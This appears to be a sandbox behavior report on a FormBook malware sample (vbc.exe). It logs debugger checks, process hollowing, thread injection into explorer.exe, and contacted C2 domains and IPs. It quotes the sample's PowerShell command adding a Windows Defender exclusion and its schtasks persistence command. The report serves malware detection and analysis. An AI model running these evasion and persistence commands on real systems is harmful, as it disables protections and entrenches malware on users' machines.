Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h] 8_2_017F4F2E
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C070D mov eax, dword ptr fs:[00000030h] 8_2_018C070D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C070D mov eax, dword ptr fs:[00000030h] 8_2_018C070D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B131B mov eax, dword ptr fs:[00000030h] 8_2_018B131B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h] 8_2_0188FF10
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h] 8_2_0188FF10
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182E730 mov eax, dword ptr fs:[00000030h] 8_2_0182E730
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180EF40 mov eax, dword ptr fs:[00000030h] 8_2_0180EF40
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8B58 mov eax, dword ptr fs:[00000030h] 8_2_018C8B58
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8F6A mov eax, dword ptr fs:[00000030h] 8_2_018C8F6A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188FE87 mov eax, dword ptr fs:[00000030h] 8_2_0188FE87
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h] 8_2_0182D294
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h] 8_2_0182D294
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018746A7 mov eax, dword ptr fs:[00000030h] 8_2_018746A7
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h] 8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h] 8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h] 8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h] 8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h] 8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h] 8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h] 8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018AFEC0 mov eax, dword ptr fs:[00000030h] 8_2_018AFEC0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018236CC mov eax, dword ptr fs:[00000030h] 8_2_018236CC
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8ED6 mov eax, dword ptr fs:[00000030h] 8_2_018C8ED6
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FE620 mov eax, dword ptr fs:[00000030h] 8_2_017FE620
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018216E0 mov ecx, dword ptr fs:[00000030h] 8_2_018216E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018076E2 mov eax, dword ptr fs:[00000030h] 8_2_018076E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h] 8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h] 8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h] 8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018AFE3F mov eax, dword ptr fs:[00000030h] 8_2_018AFE3F
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h] 8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h] 8_2_018AB260
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h] 8_2_018AB260
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180766D mov eax, dword ptr fs:[00000030h] 8_2_0180766D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183927A mov eax, dword ptr fs:[00000030h] 8_2_0183927A
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00409B40 LdrLoadDll, 8_2_00409B40
Source: C:\Users\user\Desktop\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.miabellavita.com
Source: C:\Windows\explorer.exe Domain query: www.joye.club
Source: C:\Windows\explorer.exe Domain query: www.maikoufarm.com
Source: C:\Windows\explorer.exe Domain query: www.mmj0115.xyz
Source: C:\Windows\explorer.exe Network Connect: 44.227.65.245 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.septemberstockevent200.com
Source: C:\Windows\explorer.exe Domain query: www.watermountsteam.top
Source: C:\Windows\explorer.exe Network Connect: 104.21.4.114 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.yungbredda.com
Source: C:\Windows\explorer.exe Domain query: www.leewaysvcs.com
Source: C:\Windows\explorer.exe Domain query: www.sharpstead.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 118.27.122.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.188.247 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 101.132.116.91 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\vbc.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 120000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\vbc.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3292 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe Jump to behavior
Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 0000000B.00000000.305520960.0000000005F40000.00000004.00000001.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.266771972.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 518412 Sample: vbc.exe Startdate: 09/11/2021 Architecture: WINDOWS Score: 100 35 www.mattlambert.xyz 2->35 37 www.joy1263.com 2->37 39 7 other IPs or domains 2->39 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 9 other signatures 2->53 9 vbc.exe 7 2->9         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\uZlkYhlkeLeaKC.exe, PE32 9->31 dropped 33 C:\Users\user\AppData\Local\...\tmpAA68.tmp, XML 9->33 dropped 59 Uses schtasks.exe or at.exe to add and modify task schedules 9->59 61 Adds a directory exclusion to Windows Defender 9->61 63 Tries to detect virtualization through RDTSC time measurements 9->63 13 vbc.exe 9->13         started        16 powershell.exe 25 9->16         started        18 schtasks.exe 1 9->18         started        signatures6 process7 signatures8 71 Modifies the context of a thread in another process (thread injection) 13->71 73 Maps a DLL or memory area into another process 13->73 75 Sample uses process hollowing technique 13->75 77 Queues an APC in another process (thread injection) 13->77 20 explorer.exe 13->20 injected 24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        process9 dnsIp10 41 www.maikoufarm.com 118.27.122.222, 49815, 80 INTERQGMOInternetIncJP Japan 20->41 43 www.mmj0115.xyz 101.132.116.91, 49821, 80 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 20->43 45 9 other IPs or domains 20->45 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Performs DNS queries to domains with low reputation 20->57 28 help.exe 20->28         started        signatures11 process12 signatures13 65 Modifies the context of a thread in another process (thread injection) 28->65 67 Maps a DLL or memory area into another process 28->67 69 Tries to detect virtualization through RDTSC time measurements 28->69
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.4.114
 www.miabellavita.com United States
13335 CLOUDFLARENETUS true
34.102.136.180
 mattlambert.xyz United States
15169 GOOGLEUS false
118.27.122.222
 www.maikoufarm.com Japan 7506 INTERQGMOInternetIncJP true
172.67.188.247
 www.septemberstockevent200.com United States
13335 CLOUDFLARENETUS true
101.132.116.91
 www.mmj0115.xyz China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd true
44.227.65.245
 www.sharpstead.com United States
16509 AMAZON-02US true

Contacted Domains

Name IP Active
www.septemberstockevent200.com 172.67.188.247 true
www.miabellavita.com 104.21.4.114 true
mattlambert.xyz 34.102.136.180 true
z010-gp-hk-06-75-adfh31.greycdn.net 103.118.81.108 true
www.maikoufarm.com 118.27.122.222 true
www.sharpstead.com 44.227.65.245 true
joye.club 34.102.136.180 true
yungbredda.com 34.102.136.180 true
www.mmj0115.xyz 101.132.116.91 true
ghs.googlehosted.com 142.250.203.115 true
www.watermountsteam.top unknown unknown
www.joye.club unknown unknown
www.yungbredda.com unknown unknown
www.leewaysvcs.com unknown unknown
www.joy1263.com unknown unknown
www.annikadaniel.love unknown unknown
www.mattlambert.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.septemberstockevent200.com/ht08/ true
  • Avira URL Cloud: safe
 low
